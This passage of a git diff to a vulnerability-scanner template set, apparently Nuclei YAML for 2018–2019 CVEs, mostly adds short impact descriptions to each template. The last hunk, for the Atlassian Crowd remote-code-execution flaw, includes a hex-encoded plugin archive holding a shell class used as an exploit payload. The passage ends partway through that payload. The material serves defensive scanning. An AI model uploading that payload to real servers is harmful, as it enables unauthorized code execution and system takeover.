information to gather intelligence for further attacks or exploit other vulnerabilities. remediation: | Apply the latest patch or upgrade to a newer version of DedeCMS to fix the path disclosure vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index ffcde7f0b8..2b975b3eac 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred. + impact: | + An attacker can gain access to sensitive information, such as usernames, passwords, and system configuration details. remediation: | Upgrade to the latest version of Anchor CMS or apply the necessary patches to fix the error log exposure vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index c102ed681b..1ed784852b 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the system. remediation: | Update WordPress Site Editor plugin to the latest version to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index b48bb98918..a9adada938 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability. + impact: | + An attacker can read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml index cdd2ec627d..ede381da41 100644 --- a/http/cves/2018/CVE-2018-7490.yaml +++ b/http/cves/2018/CVE-2018-7490.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of uWSGI PHP Plugin or apply the necessary patches to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 5b9652b300..f34e52d32a 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. + impact: | + Critical remediation: | Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team. reference: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 719a62f934..20fa14ee52 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + impact: | + Remote attackers can execute arbitrary code on the affected Drupal installations. remediation: | Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal. reference: diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index d48712c65a..45a614a903 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: medium description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. + impact: | + An attacker can exploit this vulnerability to gain knowledge of the server's directory structure, potentially aiding in further attacks. remediation: | Upgrade to the latest version of CouchCMS (2.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 7404528811..a530e3c677 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -6,6 +6,8 @@ info: severity: high description: | DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. + impact: | + Successful exploitation of these vulnerabilities can lead to unauthorized actions performed on behalf of the user and execution of arbitrary code. remediation: | Apply the latest security patches and update to a newer version of DedeCMS. reference: diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index 1f965478a7..c702ae6fe0 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: | Upgrade Acrolinx Server to version 5.2.5 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 4662ee2398..820f982409 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache ActiveMQ versions 5.0.0 to 5.15.5 are vulnerable to cross-site scripting via the web based administration console on the queue.jsp page. The root cause of this issue is improper data filtering of the QueueFilter parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Apache ActiveMQ to a version higher than 5.15.5 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 7da175bf75..757106136b 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection). + impact: | + Successful exploitation of this vulnerability could lead to information disclosure, denial of service. remediation: | Apply the necessary patches or upgrade to a non-vulnerable version of Apache OFBiz. reference: diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index 6dd4ddc8f7..a1877e5484 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml @@ -5,6 +5,8 @@ info: author: milo2012 severity: high description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application. remediation: | Apply the necessary patches or updates provided by the vendor to fix the authentication bypass vulnerability in AppWeb. reference: diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 612c11cad1..b75ba13f4e 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the WordPress WP Security Audit Log plugin. remediation: | Update to the latest version of WordPress WP Security Audit Log plugin (3.1.2 or higher) to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index d182ecb9e9..a5de2ea375 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Upgrade to a patched version of Mirasys DVMS Workstation (>=5.12.7) to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 9ae5a4a9a3..e74cba4a3c 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. remediation: | Upgrade to a patched version of Cobub Razor. reference: diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index 7474abbc50..2d874a5d45 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. + impact: | + This vulnerability can lead to unauthorized access to sensitive files on the server, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade to 4.1.15. reference: diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index f5ea19bd11..1bcf8bca50 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + impact: | + An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. remediation: | Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. reference: diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 58ed8b2179..84a5ec0375 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -5,6 +5,8 @@ info: author: philippedelteil severity: critical description: Etherpad Lite before 1.6.4 is exploitable for admin access. + impact: | + An attacker can bypass the admin authentication and gain unauthorized access to the admin panel. remediation: | Upgrade to Etherpad Lite version 1.6.4 or later to fix the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index 3ab43f3cde..e39767d13a 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -8,6 +8,8 @@ info: TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response. + impact: | + An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to unauthorized configuration changes or data exfiltration. remediation: | Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability and ensure strong and unique passwords are used for device access. reference: diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index aa2e733792..81ad15c1d9 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary commands on the affected system. remediation: | Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. reference: diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index cc0f48997b..ce4646a165 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the necessary patches or updates provided by Apache Tomcat to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index e7961787cc..ff04836531 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server. remediation: | Upgrade Apache Struts to a version higher than 2.5.20 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 40815b1fd2..e1878aa02d 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -5,6 +5,8 @@ info: author: davidmckennirey severity: critical description: Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability. + impact: | + Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by Kentico CMS to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 609742f9a9..4f4f6322d9 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious HTML code or execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Apache HTTP Server version 2.4.40 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index a68325b085..a01a821762 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Upgrade Apache HTTP server to version 2.4.40 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 446f68d13b..fb5da59779 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks. reference: diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 395a9d7f07..a0da269df3 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. remediation: | Upgrade to Babel version 7.4.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 8e9add1cbb..16565a51cd 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml @@ -5,6 +5,8 @@ info: author: RedTeamBrasil severity: critical description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 4d01e7d565..3ca1060898 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: medium description: Jenkins through 2.196, LTS 2.176.3 and earlier prints the value of the cookie on the /whoAmI/ URL despite it being marked HttpOnly, thus making it possible to steal cookie-based authentication credentials if the URL is exposed or accessed via another cross-site scripting issue. + impact: | + The exposure of cookies can lead to session hijacking, unauthorized access, and potential data breaches. remediation: | Upgrade Jenkins to a version higher than 2.196 to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index 78346a1033..fd7005c75b 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade to a patched version of the Jenkins build-metrics plugin or apply the necessary fixes provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-10692.yaml b/http/cves/2019/CVE-2019-10692.yaml index f085023463..9491d0b51f 100644 --- a/http/cves/2019/CVE-2019-10692.yaml +++ b/http/cves/2019/CVE-2019-10692.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database. remediation: | Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher). reference: diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 2fcba58790..6a3816467a 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -6,6 +6,8 @@ info: severity: high description: | BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to a patched version of BlogEngine.NET or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 30263c022b..dc4d3c9354 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Upgrade mongo-express to version 0.54.0 or higher. reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 diff --git a/http/cves/2019/CVE-2019-11013.yaml b/http/cves/2019/CVE-2019-11013.yaml index 06306fa9b7..c7af1618ec 100644 --- a/http/cves/2019/CVE-2019-11013.yaml +++ b/http/cves/2019/CVE-2019-11013.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and further exploitation of the system. remediation: | Upgrade Nimble Streamer to a version higher than 3.5.4-9 to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 4d25d54ad7..ee91b39e26 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. + impact: | + An attacker can exploit this vulnerability to gather sensitive information, potentially leading to further attacks. remediation: | Disable or restrict access to the Debug Endpoint pprof to prevent unauthorized access. reference: diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 3f3f3a5e34..17916b58ef 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html "System contact" field. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Apply the latest patch or upgrade to a version that addresses the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 0bfb26a9e5..0cd8765574 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -5,6 +5,8 @@ info: author: organiccrap severity: critical description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access. + impact: | + An attacker can access sensitive information stored on the system, potentially leading to further compromise. remediation: | Apply the latest security patches and updates provided by Pulse Secure. reference: diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 2bb1ce5c5a..a538318edd 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system, leading to complete compromise of the system. remediation: | Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability. reference: @@ -16,15 +18,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-11580 - cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* epss-score: 0.97491 + cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: atlassian product: crowd shodan-query: http.component:"Atlassian Jira" - vendor: atlassian tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth - variables: plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e00180000